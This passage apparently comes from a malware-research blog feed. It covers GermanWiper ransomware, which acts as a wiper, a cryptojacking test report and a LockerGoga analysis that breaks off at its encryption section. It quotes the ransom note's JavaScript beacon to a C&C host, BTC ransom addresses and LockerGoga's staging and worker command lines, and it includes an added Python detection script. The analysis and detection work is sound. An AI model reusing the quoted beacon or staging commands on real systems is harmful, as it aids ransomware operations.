<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">1MRvr9bDBKb8LcctebM7RqXi8Xiiv35fUt</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">1DbAXfFY1sCqea4We28td8e3FUGh1MvKbT</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">16Cq2MpX1LDMXEa3eGuQ3FGWC3kNoowzjg</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">1JKN1uz6BaWUwftoPSah5RnvD9aTjimkZe</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">1FkCZkm74zEQ3UNCScBwUzuxYbbWH15h5z</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">1HugNNr72MHAd53S3ygHwJWAxi655tpBqa</span></div>
</td><td style="border-bottom: solid #ffffff 1pt; border-left: solid #ffffff 1pt; border-right: solid #ffffff 1pt; border-top: solid #ffffff 1pt; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">17vH1YT63jRTavNQRGGsP49xjzZtZsxNRF</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">+1FZhTBLZMRQms5q8h4iHZAYdEpgr6dhpw2</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">1EJnYFmNmVeozrFjByzQmWBMbCb6sj8KNh</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">13iv6aUc8oEBg9R9MFREwvTRTjecy2TBXY</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">1E3s6S3YUfadZP27ZtwtPENbSzV4Mr3kv6</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">18tnmDSvLb5sxyVaid3K9YdEVfT9THTMfo</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">1Eh4C1RodoiFEM3G7ZozLojNSNGPLh8Xo1</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">19PEKTCo1J2Qh1jCHxnsXj4rAAvvnoyrDB</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">1Ft45aW8b3HeoJGe9NmJz8H3Hu7NpwdHzY</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">1DAkV3n3QZZtYZAmGDFCQyah7YTCRDNmH1</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">+19cwrjV2FM3fw4BqBwnsBi9hDwMwUbJyy8</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">13AsdXkb7LG2aJzroZtZpCsqbhyhZgrpwc</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">167kVP1ctnw48eEM97ZHbwTTLEUaEoHtfN</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">1A8Rx1PHyYq4xJNSoDnkua9rsQaVuL7KSU</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">1D8TE2LRDjRU3b6143LR4GXWJbvhnzoiKu</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">+1GJfdiu2AEQA9NsFyKypx7YMfoHFZi7KzR</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">1Hk2uAwoW6z5QdrtssKXBQ9d6VTvn8nPD8</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">19D4iUqYYd1y3Hn295yfsacXUykWwqZaov</span></div>
</td></tr>
</tbody></table>
</div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">For example, the first BTC address in the list received </span><a href="https://www.blockchain.com/btc/address/1KjBUvN4Gfipi3bGmuAPDcJEqx48Nx5m4i" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre;">0.150389 BTC ($1500)</span></a><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> on August 1, 2019.</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><img height="276" src="https://lh4.googleusercontent.com/17PDXYSVcbhtn-bI-JeeEJkhciEkisgwciMsADdVNmsgZex1Pa3zfvDa0tElu6FQfn-syKONDT3aDtXQe_65VP9VA6aa30MhECBBRVvl-HHlJFK5UEA7cinUrfSLF4spzKa784E2" style="border: none;" width="624" /></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">GermanWiper creates a jpg file and changes a desktop photo to that which tells to open the XXXXX_Entschluesselungs_Anleitung.html.</span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><img height="353" src="https://lh3.googleusercontent.com/tfB06DRVZmVGCjH6C7QGuXQ_74IDEp0rF-qS5t1VbGxIqDR09LvmUgVnWdxDDhHeLO0e3JHHXzUeQbjFQ5ZZ3rShpvAtONe2IrpmobhyP6oFjoeirJ6f7QKUghaWx1UBZVFv2KPF" style="border: none;" width="624" /></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<h1 dir="ltr" style="line-height: 1.2; margin-bottom: 6pt; margin-top: 10pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 20pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Network communications</span></h1>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">At the end of the HTML source code, the JavaScript code is located. It implements communication with the C&C server 'expandingdelegation.top'.</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">When the HTML page is opened, the JavaScript code is executed.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">“<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.4.1/jquery.min.js"></script><script>$( document ).ready(function() {$.get("hxxp://expandingdelegation.top/majis/c.php?status=start&ext=O6qkv&BRA=MURBa1YzbjNRWlp0WVpBbUdERkNReWFoN1lUQ1JETm1IMQ==&FCF=13257&FCS=699675323",function(data){});});</script></html>”</span></div>
<h1 dir="ltr" style="line-height: 1.38; margin-bottom: 6pt; margin-top: 20pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 20pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Total wiping</span></h1>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Finally, the cmd script deletes volume shadow copies and disable Windows automatic startup repair.</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "georgia"; font-size: 13.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><img height="240" src="https://lh3.googleusercontent.com/WTzOyqCGeUPxLvGWBBvZOiZ34WM_-hPVnkQBv_BREfFjs-Gz9PoMoRZ4JE2sbAs1anQ9El_AgzDcGVg3X1BASiZTQcFXok3nhq9uhNPsIESlAj4S8c-rmkH80hvic-tfQ1SwJ9fs" style="border: none;" width="624" /></span></div>
<h1 dir="ltr" style="line-height: 1.38; margin-bottom: 6pt; margin-top: 20pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 20pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Conclusion</span></h1>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">This is not the first case when, intentionally or due to a mistake, the ransomware was turned into a wiper but In this case targeting users in Germany. The case of GermanWiper shows that before paying the ransom, it makes sense for a victim first to contact cybersecurity laboratories or Police to verify if decryption is possible at all.</span></div>
<h1 dir="ltr" style="line-height: 1.38; margin-bottom: 6pt; margin-top: 20pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 20pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">IoCs</span></h1>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">expandingdelegation.top</span></div>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">SHA-256: 21c756af39c6a502f7ec173f0643389806912efc1947a93bd6618fe2dae58e39</span><br />
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span>
<br /></div>
<div>
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span></div>
</div>
Alexander Adamovhttp://www.blogger.com/profile/10336415028200154730noreply@blogger.com0tag:blogger.com,1999:blog-4482404627541610819.post-23025338617827635652019-08-27T23:56:00.001-07:002019-08-28T00:05:53.593-07:00Anti-Cryptojacking Test - July 2019<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<div style="text-align: center;">
<span id="docs-internal-guid-188d0789-7fff-59b0-b1bf-df4301fd6ea9"><img height="300" src="https://lh6.googleusercontent.com/iqzb4VkXAnWdVghPMAIW0PpCoVuOd8djvMjOwPwzcMt09eERVrUfiWsqtFOasjs7gt47_dFVyEAllCsJzndkhQa5mryECVe8Jr_9CQ0Z948atX7UAWZSXNYvC2AftbxPhgN6M7lD" style="border: none;" width="400" /></span></div>
<br />
Cryptojacking or malicious cryptomining is a new type of threat that can be described as the unsolicited use of a user’s computing device to mine cryptocurrency. There are two types of cryptojacking attack: general-purpose and targeted. <br />
<a name='more'></a><br />
In a general-purpose attack, a cryptominer is installed on the infected device, typically as the result of a mass spam campaign that leverages social engineering to establish a foothold on the victim’s machine. Alternatively, such attacks may end in ransomware delivery. Typically, once executed on a user’s machine, a Trojan-Downloader checks the number of CPUs/GPUs and, if there are two or more, favors installing cryptomining software.<br />
<div>
<br /></div>
<div>
For example:<br />
<ul style="text-align: left;">
<li>Jan 2018 - a malicious Monero cryptominer called Smominru (a.k.a. Ismo) spread using the EternalBlue exploit (CVE-2017-0144) and earned 8,900 Monero, equivalent to approximately $3M.</li>
<li>Jan 2018 - Monero and Electroneum miners were distributed using RIG EK via the installation of SmokeLoader malware.</li>
<li>Feb 2018 - Trickbot, delivered through a mass spam campaign, added a Monero cryptomining module.</li>
</ul>
In a targeted attack, by contrast, criminals look for ways to gain access to corporate environments, mostly located in the cloud, whose high computational capacity lets them mine cryptocurrency at the expense of the compromised tenant. One common way attackers get into a corporate cloud cluster is by searching for secrets such as keys, logins, and passwords that engineers have mistakenly published in configuration files on public code repository services such as GitHub and GitLab; for this purpose attackers use secrets crawlers, for example TruffleHog. Another is scanning the Internet for machines exposed through misconfiguration, using the Shodan vulnerability and exposure scanning service. <br />
<br />
Examples of targeted cryptojacking attacks:<br />
<ul style="text-align: left;">
<li>Oct 2017 - A security flaw in Oracle’s WebLogic Server (CVE-2017-10271) allowed attackers to install miners at universities and research institutions.</li>
<li>Feb 2018 - Tesla's Amazon Web Services (AWS) account was exposed, and attackers deployed cryptocurrency mining software called Stratum to mine cryptocurrency using the cloud's computing power.</li>
<li>Feb 2018 - Check Point reported that attackers made more than $3 million by mining Monero on Jenkins servers, exploiting CVE-2017-1000353.</li>
<li>Sep-Oct 2018 - A Docker API misconfiguration led to the deployment of a Monero cryptominer in target environments in China, the United States, France, Germany, and the United Kingdom.</li>
</ul>
Malicious cryptomining can also run in the web browser using the Coinhive API, which was recently shut down due to misuse. While the technique is not malicious in itself, running it without the user’s consent makes it illegal. <br />
<br />
Therefore we, like many other security vendors, consider cryptominers Potentially Unwanted Software (PUS) and decided to test enterprise anti-malware solutions against them.<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial"; font-size: 11pt; white-space: pre-wrap;"><br /></span></div>
Read the full report by <a href="https://github.com/AlexanderAda/NioGuardSecurityLab/raw/master/Test%20Reports/AntiCryptojacking%20Test%20-%20July%202019.pdf" target="_blank">the link</a>.</div>
</div>
Alexander Adamovhttp://www.blogger.com/profile/10336415028200154730noreply@blogger.com0tag:blogger.com,1999:blog-4482404627541610819.post-82066820931186888772019-03-23T15:08:00.000-07:002019-09-01T10:49:26.474-07:00Analysis of LockerGoga Ransomware<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://upload.wikimedia.org/wikipedia/commons/7/7f/Rjukan_fabrikker_-_Norsk_Hydro.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="ÐаÑÑинки по запÑоÑÑ Norsk Hydro" border="0" src="https://upload.wikimedia.org/wikipedia/commons/7/7f/Rjukan_fabrikker_-_Norsk_Hydro.jpg" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
Norsk Hydro back in 1905. </div>
<div class="separator" style="clear: both; text-align: center;">
Source: https://commons.wikimedia.org/wiki/File:Rjukan_fabrikker_-_Norsk_Hydro.jpg</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
This week BleepingComputer <a href="https://www.bleepingcomputer.com/news/security/lockergoga-ransomware-sends-norsk-hydro-into-manual-mode/">reported</a> that LockerGoga ransomware was allegedly responsible for disrupting Norsk Hydro's IT control systems and forcing the Norwegian industrial giant to switch to manual operation. Later, according to <a href="https://motherboard.vice.com/amp/en_us/article/8xyj7g/ransomware-forces-two-chemical-companies-to-order-hundreds-of-new-computers">Motherboard</a>, the same ransomware disrupted IT services at two more US chemical companies, Hexion and Momentive. It therefore seems that the attackers behind LockerGoga target critical infrastructure, and those mentioned above are unlikely to be the only victims so far. Below, we provide a detailed analysis of the ransomware's encryption process.<br />
<div style="text-align: left;">
</div>
<a name='more'></a><br />
<h2 style="line-height: 1.38; margin-bottom: 6pt; margin-top: 18pt; text-align: left;">
<span style="color: black; font-family: "arial"; font-size: 16pt; font-weight: 400; vertical-align: baseline; white-space: pre;">Detection</span></h2>
Signature-based antivirus engines missed the LockerGoga sample when it was first uploaded to VirusTotal (March 8, 2019), presumably because of its valid digital signature.<br />
<br />
<div style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;">
<span style="color: black; font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre;"><img height="173" src="https://lh6.googleusercontent.com/Qp9q6847-zfl8wxWjp-gf-mPiybNDZRw9nvOVojnHlYXofBO2kIcTRc6dNNCjPuBaza86rM_JHvCjWZ2BVUsEs7ILOaooxjZ9pCwGoifQtRwhp_T5P8gOvHLEIKwqYuSOkYA3J0G" style="border: none; transform: rotate(0rad);" width="624" /></span></div>
Source: <a href="https://www.virustotal.com/en/file/eda26a1cd80aac1c42cdbba9af813d9c4bc81f6052080bc33435d1e076e75aa0/analysis/1552049030/">https://www.virustotal.com/en/file/eda26a1cd80aac1c42cdbba9af813d9c4bc81f6052080bc33435d1e076e75aa0/analysis/1552049030/</a><br />
<br />
Later, the certificate was revoked.<br />
<div style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;">
<span style="color: black; font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre;"><img height="136" src="https://lh5.googleusercontent.com/PZc6tkOzVKHZa7nFgvR4DUvcH9Of5qm9OX8wbIJZLr1Mo_fMZDPm0-TwMYIYE81sWlzDaIIS3Q9eDYKbnXBD8kPvRkEQYk8x7OZxxGhvzrUd5CF1FZ77MxYCPDIcjY2P-aITa2pu" style="border: none; transform: rotate(0rad);" width="624" /></span></div>
<div style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;">
<a href="https://www.virustotal.com/gui/file/eda26a1cd80aac1c42cdbba9af813d9c4bc81f6052080bc33435d1e076e75aa0/detection" style="text-decoration-line: none;"><span style="color: #1155cc; font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre;">https://www.virustotal.com/gui/file/eda26a1cd80aac1c42cdbba9af813d9c4bc81f6052080bc33435d1e076e75aa0/detection</span></a><span style="color: black; font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre;"> </span></div>
<div style="text-align: left;">
<span style="font-weight: normal;"><br /></span></div>
<h2 style="line-height: 1.38; margin-bottom: 6pt; margin-top: 18pt; text-align: left;">
<span style="color: black; font-family: "arial"; font-size: 16pt; font-weight: 400; vertical-align: baseline; white-space: pre;">Static analysis</span></h2>
The binary contains statically linked Boost and Crypto++ libraries, which complicates analysis of the ransomware even though no obfuscation, packing, or code encryption is used.<br />
<br />
Version 1320 carries the following digital certificate, issued to ‘ALISA LTD’ and revoked after the attack was discovered. Other versions of LockerGoga were supplied with certificates issued to Alina Ltd, Kitty's Ltd., Mikl Limited, and AB Simba Limited.<br />
<br />
<br />
<div style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;">
<span style="color: black; font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre;"><img height="385" src="https://lh6.googleusercontent.com/_DMaEtt7w2yqiRAx-Jh5PpVG4IcfYJl28FAI4jhHnz2TYWpfEJlmcaYnyPgIlskJtkICQTf6ylWi-AZ2qulAsmdlJcTzHiln87sVZHi0NSabaoO7hH31jGTF0yRYw8u1lazlc3C1" style="border: none; transform: rotate(0rad);" width="290" /></span></div>
<div style="text-align: left;">
<span style="font-weight: normal;"><br /></span></div>
<h2 style="line-height: 1.38; margin-bottom: 6pt; margin-top: 18pt; text-align: left;">
<span style="color: black; font-family: "arial"; font-size: 16pt; font-weight: 400; vertical-align: baseline; white-space: pre;">Installation</span></h2>
<br />
<br />
Once started, the cryptolocker copies itself to the %Temp% folder under a hardcoded name.<br />
<br />
<div style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;">
<br />
<blockquote class="tr_bq">
<i>C:\Windows\system32\cmd.exe /c move /y "C:\LockerGoga ransomware" C:\Users\<USER>\AppData\Local\Temp\yxugwjud<ID>.exe</i></blockquote>
After that, it executes the master process with the ‘-m’ switch.</div>
<h2 style="line-height: 1.38; margin-bottom: 6pt; margin-top: 18pt; text-align: left;">
<span style="color: black; font-family: "arial"; font-size: 16pt; font-weight: 400; vertical-align: baseline; white-space: pre;">Finding files for encryption</span></h2>
<div style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;">
The master process creates a list of files to be encrypted. Version 1320 of the cryptolocker does not filter files by extension and encrypts all accessible files on the disks.<br />
</div>
<h2 style="line-height: 1.38; margin-bottom: 6pt; margin-top: 18pt; text-align: left;">
<span style="color: black; font-family: "arial"; font-size: 16pt; font-weight: 400; vertical-align: baseline; white-space: pre;">Interprocess Communication</span></h2>
<br />
The master process sends a task to a worker through named shared memory created with CreateFileMapping; the task provides the path of the file to encrypt. The worker accesses the master’s named shared memory by calling OpenFileMapping with the identifier ‘Global\SM-yxugwjud’.<br />
<br />
The master process then starts workers with the ‘-s’ parameter, also passing the identifier of the created named shared memory as ‘-i Global\SM-yxugwjud’.<br />
<br />
<div style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;">
<span style="background-color: white; color: black; font-family: "tahoma"; font-size: 12pt; vertical-align: baseline; white-space: pre;"><img src="https://lh5.googleusercontent.com/9eZiCCmbM9jxesXX11TXOrouTnGueA9Hpxg9c3UGR9Gq8VsdPG-V5XNA8pHdkJMKPYX4ZFMJPiE9jl3GW8Nsrch5dMD-mkonONd7Hp7wIkew_Z3b-aI_8MQqoEs7XqjI6Ecbb9ph" style="border: none; transform: rotate(0rad);" /></span></div>
<div style="text-align: left;">
<span style="font-weight: normal;"><br /></span></div>
<br />
For example:<br />
<br />
<div>
<blockquote class="tr_bq">
<i>C:\Users\<User>\AppData\Local\Temp\yxugwjud1342.exe -i Global\SM-yxugwjud -s</i></blockquote>
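An added detection example, not code from the original analysis: the staging, master and worker behaviour described above expressed as checks over process-creation events. The hardcoded Temp name yxugwjud<ID>.exe, the ‘-m’ and ‘-s’ switches and the ‘-i Global\SM-yxugwjud’ identifier come from the analysed version; the user name, PIDs and source path in the sample events are constructed, and other versions may use a different name.

```python
import re

# Names and switches from the analysis above (version 1320): the hardcoded copy name
# yxugwjud<ID>.exe in %Temp%, the master switch -m, the worker switch -s and the shared
# memory mapping passed as "-i Global\SM-yxugwjud". Other versions may use other names.
STAGED_EXE_RE = re.compile(r"\\AppData\\Local\\Temp\\yxugwjud\d*\.exe$", re.IGNORECASE)
MOVE_TO_TEMP_RE = re.compile(
    r"cmd\.exe.*\s/c\s+move\s+/y\s+.*\\AppData\\Local\\Temp\\yxugwjud\d*\.exe",
    re.IGNORECASE)
SHM_RE = re.compile(r"-i\s+Global\\SM-yxugwjud\b", re.IGNORECASE)


def _switches(cmdline):
    """Single-letter dash switches in a command line, e.g. {'-i', '-s'}."""
    return {tok.lower() for tok in cmdline.split() if re.fullmatch(r"-[A-Za-z]", tok)}


def classify(event):
    """Return a verdict for one process-creation event (dict with 'image' and 'cmdline'), or None."""
    image = event.get("image", "")
    cmdline = event.get("cmdline", "")
    # Stage 1: cmd.exe moves the original binary into %Temp% under the hardcoded name.
    if MOVE_TO_TEMP_RE.search(cmdline):
        return "lockergoga-staging"
    if not STAGED_EXE_RE.search(image):
        return None
    switches = _switches(cmdline)
    # Stage 3: workers are started with -s and the shared-memory identifier via -i.
    if "-s" in switches and SHM_RE.search(cmdline):
        return "lockergoga-worker"
    # Stage 2: the master process runs with -m.
    if "-m" in switches:
        return "lockergoga-master"
    return "lockergoga-temp-binary"   # right name and location, unexpected arguments


def scan(events):
    """Run classify over a sequence of events; return (pid, verdict) for each hit."""
    hits = []
    for event in events:
        verdict = classify(event)
        if verdict:
            hits.append((event.get("pid"), verdict))
    return hits


# Constructed sample events (user name, PIDs and source path are made up; the Temp name,
# switches and mapping identifier follow the analysis).
SAMPLE_EVENTS = [
    {"pid": 4120, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'C:\Windows\system32\cmd.exe /c move /y "C:\Users\alice\Downloads\invoice.exe" '
                r"C:\Users\alice\AppData\Local\Temp\yxugwjud1342.exe"},
    {"pid": 4188, "image": r"C:\Users\alice\AppData\Local\Temp\yxugwjud1342.exe",
     "cmdline": r"C:\Users\alice\AppData\Local\Temp\yxugwjud1342.exe -m"},
    {"pid": 4204, "image": r"C:\Users\alice\AppData\Local\Temp\yxugwjud1342.exe",
     "cmdline": r"C:\Users\alice\AppData\Local\Temp\yxugwjud1342.exe -i Global\SM-yxugwjud -s"},
    {"pid": 4250, "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": r"notepad.exe C:\Users\alice\Documents\notes.txt"},
    {"pid": 4262, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c move /y C:\Users\alice\report.docx C:\Users\alice\Documents\report.docx"},
]

if __name__ == "__main__":
    for pid, verdict in scan(SAMPLE_EVENTS):
        print(pid, verdict)
```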
<h2 style="line-height: 1.38; margin-bottom: 6pt; margin-top: 18pt; text-align: left;">
<span style="color: black; font-family: "arial"; font-size: 16pt; font-weight: 400; vertical-align: baseline; white-space: pre;">Encryption</span></h2>
